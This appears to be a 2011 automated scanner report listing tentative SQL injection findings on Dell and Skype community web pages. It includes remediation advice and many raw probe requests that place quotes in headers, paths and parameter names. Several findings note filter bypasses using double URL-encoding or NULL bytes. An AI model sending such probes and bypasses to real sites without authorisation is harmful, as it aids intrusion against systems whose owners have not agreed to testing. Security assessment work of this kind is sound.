SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sna/productdetail.aspx?sku= HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
Response 1 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 25226 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:43 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:30:42 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]... ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div> ...[SNIP]...
Request 2
GET /sna/productdetail.aspx?sku= HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 23596 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:30:43 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]...
1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://accessories.us.dell.com
Path:
/sna/productdetail.aspx
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sna/productdetail.aspx?sku=&1%00'=1 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 25481 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:36 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:30:36 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]... ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div> ...[SNIP]...
Request 2
GET /sna/productdetail.aspx?sku=&1%00''=1 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 23870 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:30:36 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell n ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Android'/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/Android''/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/English/ct-p/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/English/ct-p/English?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/English/ct-p/English?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/Skype-Manager/bd-p/Skype_Manager
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Skype-Manager/bd-p/Skype_Manager?1'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/Skype-Manager/bd-p/Skype_Manager?1''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Skype-for-Business/bd-p'/pt_business HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/Skype-for-Business/bd-p''/pt_business HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:45:27 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Support-et-information/bd-p%2527/fr_community HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/Support-et-information/bd-p%2527%2527/fr_community HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:47:25 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]...
1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close
GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 9 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> An Unexpecte ...[SNIP]... <div class="exception-page-message IncorrectValueFormatException lia-component-content" class="exception-page-message IncorrectValueFormatException"> ...[SNIP]... <li> Sorry, your request failed. A notification has been sent to the development team for investigation.<p> ...[SNIP]...
Request 2
GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
